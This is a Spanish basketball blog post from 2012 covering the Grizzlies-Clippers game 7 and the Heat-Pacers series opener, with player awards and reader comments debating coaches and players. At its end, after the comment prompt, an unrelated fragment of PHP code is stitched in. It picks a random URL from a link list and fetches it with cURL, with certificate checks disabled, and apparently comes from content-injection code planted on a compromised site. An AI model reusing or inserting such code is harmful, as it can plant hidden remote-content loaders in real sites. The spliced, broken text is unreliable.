La Crónica: Sorpresas y certezas

14 de May de 2012 por MagicJohnson32

Las 18.000 gargantas del FedEx se apagaban, frustradas, con un nuevo error de OJ Mayo. Restaba menos de un minuto para la conclusión del séptimo partido entre Grizzlies y Clippers y, tras una batalla sin concesiones de ningún tipo a lo largo de toda la serie, los locales capitulaban (82-72). No estuvieron los Grizzlies a la altura que exigía la cita, pese a que, como el resto de la eliminatoria, se jugó en un terreno que le agrada.

Fue otro partido feo, de porcentajes pobres, en el que detalles y momentos puntuales toman el primer plano. En esta ocasión fue la horrible actuación de Mayo y, especialmente, de Mike Conley a lo largo de toda la noche. El 3 de 24 en lanzamientos que acumularon se sumó al mal día de Randolph en el tiro, aunque el ala-pívot al menos aportó rebote y dureza ante Blake Griffin. Si Rudy Gay y Marc Gasol fueron los únicos jugadores de Memphis capaces de ver aro, Chris Paul encontró sus mejores aliados en el banquillo. Los suplentes de los Clippers anotaron 16 de sus 30 tiros y la mitad de los 82 puntos del equipo. Tal fue la influencia de jugadores como Kenyon Martin y Reggie Evans, que Griffin no abandonó el banquillo en todo el tramo final. Se llegó con el marcador equilibrado al último cuarto en un partido de nervios y brazos encogidos. Vinny del Negro sacó a pista a todos sus suplentes y estos respondieron anotando 9 puntos más que sus rivales en cinco minutos y con un parcial en el periodo de 26-15. No fue el final que esperaban los Grizzlies, aunque probablemente fue el que merecieron.

 

En Miami se abrió la serie entre Heat y Pacers con un partido en el que predominó la lógica pero que tuvo dos mitades claramente diferenciadas. Controlaron el juego de inicio los de Indianapolis gracias a su pareja interior, Hibbert y West, efectivos en la anotación y activos bajo los aros. Se llegó al descanso con +6 para los visitantes y con noticias de lesión abdominal de Chris Bosh, que estaba firmando una buena primera mitad cuando se fue al suelo tras un mate y es duda para, al menos, lo que queda de eliminatoria. Y fue precisamente la ausencia de Bosh lo que abrió las compuertas al torrente que suponen Wade & LeBron. James se fue apropiando del partido y los Pacers empezaron a palidecer, sobre todo a raíz de los problemas de faltas de Hibbert, que obligaron a Vogel a sentarlo durante un buen tramo. Barbosa y Collison no alcanzaron a compensar la noche negra de Paul George y Granger, empequeñecido durante toda la velada por LeBron, y el último cuarto fue de color claramente local (86-95). Los Heat se adelantan; los Pacers saben que pueden plantar cara.

PREMIOS

MVP: Esta vez no hay quien tosa a LeBron James. Anotó 32 puntos, 16 de ellos en el último cuarto, y además capturó 15 rebotes, su récord de la temporada.

Sorpresa: Como hemos comentado en la crónica, el banco de Los Angeles Clippers anotó 25 puntos en el último cuarto, 41 puntos en total. ¡Quién le iba a decir a Kenyon Martin que a estas alturas resultaría decisivo en un séptimo partido de Playoffs!

Decepción: Entre Zach Randolph, Mike Conley y OJ Mayo consiguieron un 6 de 36 en tiros de campo. No les fue mucho mejor a Danny Granger y Paul George.

Esfuerzo en vano: David West y Roy Hibbert anotaron cada uno 17 puntos pero fueron insuficientes ante el empuje final de LeBron. Por parte de los Grizzlies, Marc Gasol y Rudy Gay despidieron la temporada con 19 puntos.

Comenta

11 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Lebron está en un momento estelar, absolutamente imparable, incluso jugándose los tiros finales y metiéndolos. Wade perfecto asistiendo y los Pacers muchos problemas en el juego perimetral como ya advertimos. Si Carmelo redujo mucho sus porcentajes en triples, Granger parece que puede desaparecer del mapa directamente en esta eliminatoria. Se ha visto claramente la impotencia de los Pacers, que no tienen el nivel suficiente para ganar un partido en Miami, y veremos qué pueden hacer en Indiana y si van a aprovechar la baja de Bosh. Granger absolutamente indefenso en la defensa de Lebron. Ese es el verdadero punto débil de los Pacers y donde el Heat tienen que buscar hacer daño constantemente. Ahora con la lesión de Bosh incluso más. Pacers se les ve incómodos, como les pasaba en la regular contra el Heat, porque no les deja hacer para nada su juego, que se basa mucho en circulación de la pelota en ataque y buscar siempre la mejor opción. Miami te ahoga, están muy bien coordinados en línea de pase y no te permiten hacer otra cosa que intentar jugar muy directo aprovechando tiros frontales de West como opción más válida. Hill se ha visto superado en el control del partido y Wade es quien está ‘partiendo la pana’,

    Ya digo, Indiana para no irse con un rosco en semifinales debería ganar uno en su casa, esas son las opciones reales visto lo visto esta noche. Aun sin Bosh, no creo que puedan aprovecharse realmente. Nadie puede asumir tiros por fuera que no sea Granger, y este está marcado por un gran defensor como Lebron que no le va a dejar hacer nada en la serie. Anulado el ‘crack’ del rival, solo les queda rezar a Pacers… No sé si llegará la serie al 5º…

      Citar

  2. HisRoyalAirness dice:
    #2

    Creo que OJ Mayo no fue el principal problema. Cuando le tocó defendió estupendamente a Paul y le puso muy buena voluntad y ganas. Es difícil encontrar anotación cuando ningún esquema favorece que te busques el tiro. Para mí el clarísimo culpable fue Conley que, aùn encima de que le liberan de tareas defensivas frente a Paul, no es capaz de anotar ni de distribuir. No ha dado la talla.
    Viendo el box score también puede parecer que, por anotaciòn, Rudy Gay hizo un buen partido por sus porcentajes de tiro pero, en mi opinión, hizo un partido nefasto; en el primer tiempo tiró a la basura varias posesiones simplemente por calentar la muñeca, con tiros forzados y lejanos y con el reloj casi sin agotar.
    A Randolph no le dieron continuidad (culpa de Conley) y Marc tuvo que hacer penetraciones para encontrar aro.
    De todos modos que CP3 no se crezca. Que Kenyon Martin y Nick Young metan TODO es una casualidad y algo que no se repetirà. Los 2 All-Star de Clippers deberìan mirar los huevos que le echaron Martin y Evans y agradecerles el pasar de ronda. También al pivot de los 15 millones DeAndre Jordan, que debería pensarse si darle la mitad de sus emolumentos a Reggie Evans.
    Ahora estoy impaciente por ver el INFIERNO que va a montarles Popovich en El Àlamo, aunque creo que la rapidez y juventud de los de LA pueden decantar la eliminatoria. Se me antoja fundamental el papel de Splitter y creo que puede compartir muchos minutos en pista con Tim. Clave también la fluidez anotadora de Manudo.

    Respecto al otro partido, si los Pacers son inteligentes pueden llevarse la serie. La tormenta exterior que suponen Wade y Lebron podrà contenerse parcialmente al no tener a Bosh abierto en el tiro de media distancia y podran cerrar más a sus interiores para impedir penetraciones. Es clave que, dada su creciente superioridad en la pintura, carguen el rebote ofensivo para impedir esos contraataques demoledores.

      Citar

  3. Andorra98 dice:
    #3

    Miami necesita a Bosh si quiere pasar en una hipotetica final de conferencia contra Boston, pero aún sin Bosh creo que tienen opciones contra Indiana. La defensa al juego interior de Pacers se basa mucho mas en cortar la linea de pase que en parar a los grandes. Y Granger va a sufrir muchísimo para sacar buenos partidos contra Miami, la defensa de Lebron le puede amargar. De todas maneras, una pena lo de Bosh, venía haciendo un gran partido hasta la lesión.

      Citar

  4. Nacho dice:
    #4

    Creo que Vinny del Negro se merece una mención. Vista la serie, los años en Treviso han servido para algo. Pocos entrenadores hay que hayan mantenido a tipos como Reggie Evans en los momentos calientes, no ya del partido, sino de una serie. Y sentando a un AllStar y figura mediática de la NBA. Y esa decisión, junto con otras, ha sido la que le ha llevado al triunfo. Ha sabido ver dónde se ganaba esta eliminatoria. Y la ha ganado, mal que me pese.
    Y los Grizzlies la han tenido, pero tenerla no es ganarla, y no vale decir que son mejores, que lo son, hay que demostrarlo. Y por ejemplo, su entrenador, al que yo proponía entre los posibles del CoY, no ha dado la talla. No ha sabido meterse en la zona de guerrillas, o no ha sabido escaquearse de ella. Para mí el gran tocado por los de Tennesse. Junto con Conley, del que hace días yo iba a decir que estaba entre los grandes bases de la competición, y era un poco el minusvalorado. Con lo cual, yo soy otro ‘tocado’ de la serie.

      Citar

  5. rumbero dice:
    #5

    HisRoyalAirness:
    Creo que OJ Mayo no fue el principal problema. Cuando le tocó defendió estupendamente a Paul y le puso muy buena voluntad y ganas. Es difícil encontrar anotación cuando ningún esquema favorece que te busques el tiro. Para mí el clarísimo culpable fue Conley que, aùn encima de que le liberan de tareas defensivas frente a Paul, no es capaz de anotar ni de distribuir. No ha dado la talla.
    Viendo el box score también puede parecer que, por anotaciòn, Rudy Gay hizo un buen partido por sus porcentajes de tiro pero, en mi opinión, hizo un partido nefasto; en el primer tiempo tiró a la basura varias posesiones simplemente por calentar la muñeca, con tiros forzados y lejanos y con el reloj casi sin agotar.

    Pues para mi el partido de Mayo fue un desastre, solo superado por el de Conley. Controlo a Paul lo que pudo, pero su aportación ofensiva fue un lastre para Memphis. No se le puede disculpar su actuación por el esquema y meterle caña a Gay por cascarse esos tiros. Mayo hizo lo mismo y con un 1/11.
    E iba a comentar algo sobre del Negro pero Nacho ya lo ha dicho casi todo. Mientras Hollins dejó que Conley jugara casi todo el partido por ejemplo, Vinny supo meter a los que hacian falta para llevarse el partido tal y como estaba, sacando un gran rendimiento de tios como Martin, Evans o Young (al que le ha sentado más que bien el cambio de aires). Y Bledsoe, que viendo los ratos que ja jugado me ha dado la impresión de gran jugador.

    Del Miami-Pacers dije en los pronósticos que veía un 4-3, que estos Pacers podían hacer algo, pero que igual venía Lebron y les pintaba la cara a todos. Pues eso… Aun asi sigo creyendo (con la primera parte como referente) que pueden plantar más cara de la prevista

      Citar

  6. Esteban dice:
    #6

    viiny del negro, quien lo diria defenestrado aqui dia tras dia, tamb en otra paginas, acusado de no estar a la altura, manejo la plantilla de maravilla, ganandole a un equipo mejor clasificado y mejor equipo en conjunto, mas homogeneo, mas estable, mas experimentado, en FIN UN EQUIPO MEJOR

    supo sortear la baja de un tal billups, y juega con foye de estola titular y deandre jordan! quiza dos de los peores titulares que jugaran segunda ronda en el oeste en los ultimos años!! durante la regulasr no lo parecio, pero que malo es jordan! q mal contrato le hicieron!”!

      Citar

  7. Esteban dice:
    #7

    sobre pacers y heat, vogel deberia jugar la mayoria de los minutos que esten wade y lebron en cancha con jones y george, para que traten de pararlos lo que mas puedan, mioentras esten granger y barbosa en cancha seran un colador de puntos frente a ellos dos

      Citar

  8. Sancho88 dice:
    #8

    Si Dahntay Jones es la solución para parar a Lebron, le saca Vogel y lo logra parar, mañana mismo me meto a sacerdote, lo juro. eso sí, en ese caso seré de los sacerdotes reivindicativos, que hacen canciones de rap y rock y se van de putas

      Citar

  9. Esteban dice:
    #9

    jones iria contra wade, no lo parara pero al menos es mejor defensor que granger y barbosa juntos

      Citar

  10. GreenPride dice:
    #10

    Pues final de la batalla Clippers-Grizzlies con final ¿inesperado? Los Clippers se han movido por el barro tan bien o mejor que los Grizzlies gracias a que no han jugado sus interiores titulares sino K-Mart y Evans que si de algo saben es de trabajo sucio bajo los aros. Partidazo decisivo de Martin (quien lo iba a decir) y los suplentes de los de LA que supieron destrabar el ataque de su equipo, cosa que nunca pudieron hacer los Grizzlies. Gran partido de Marc, el mejor de largo en unos Grizzlies que con un Mayo bajo mínimos y un Randolph que ha jugado sólo a rachas han demostrado que les falta mucha claridad ofensiva. Creo que esta vez no se pueden cargar las tintas contra Gay que fue de los pocos que vio aro en Memphis y como ya se ha dicho fue Conley el que hizo peor partido, ni pudo dirigir a los suyos ni anotar.
    La series deja muchas dudas sobre el futuro de Memphis que creo que seguirá buscando un traspaso para Mayo aunque quizás sería mejor conseguir algo mejor haciendo el trade con Gay. Está claro que necesitan más potencial exterior para poder dar otro paso.
    En cuanto a los Clippers han demostrado no ir tampoco muy sobrados en ataque. CP3 tiene que acaparar más tiros ante una serie que ha ido desnudando al bueno de Griffin hasta el punto de no jugar el cuarto decisivo de la serie. Los Clips dependen mucho del acierto de sus exteriores (Young, Mo-Williams, Foye) para poder hacer puntos pero al menos han demostrado mucho carácter y ganas de ganar. En cuanto a su serie con los Spurs yo no les concedo muchas opciones. Habrá un gran duelo CP3-Parker pero creo que la rotación y la defensa de los Spurs es muy superior aunque ya hablaremos de ello en su post.

      Citar

  11. GreenPride dice:
    #11

    En cuanto al Heat-Pacers, los Pacers han demostrado ser un buen equipo al que le falta alguien que tire de ellos en los momentos más calientes, vamos una estrella estilo Lebron y Wade. Aún así han demostrado poder plantar cara y con la lesión de Bosh su superioridad interior debería ser casi insultante el resto de la serie. Si Bosh no puede volver en toda la serie creo que tendremos serie larga, sobre todo si con la ventaja interior los Pacers pueden doblar balones para que Granger y George se rediman de su horrible primer partido. El gran problema para los Pacers será parar al dúo LeBron-Wade. Creo que Vogel debería intentar cerrar mucho su defensa en el interior y que los grandes ayuden mucho pues ahora marcarán a jugadores sin mucho peligro ofensivo. Si consiguen sacar a LeBron y Wade de la zona pueden hacer mucho daño a los Heat. Sin Bosh creo que los Heat pasarán pero que la serie se alargará probablemente hasta el 7º

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>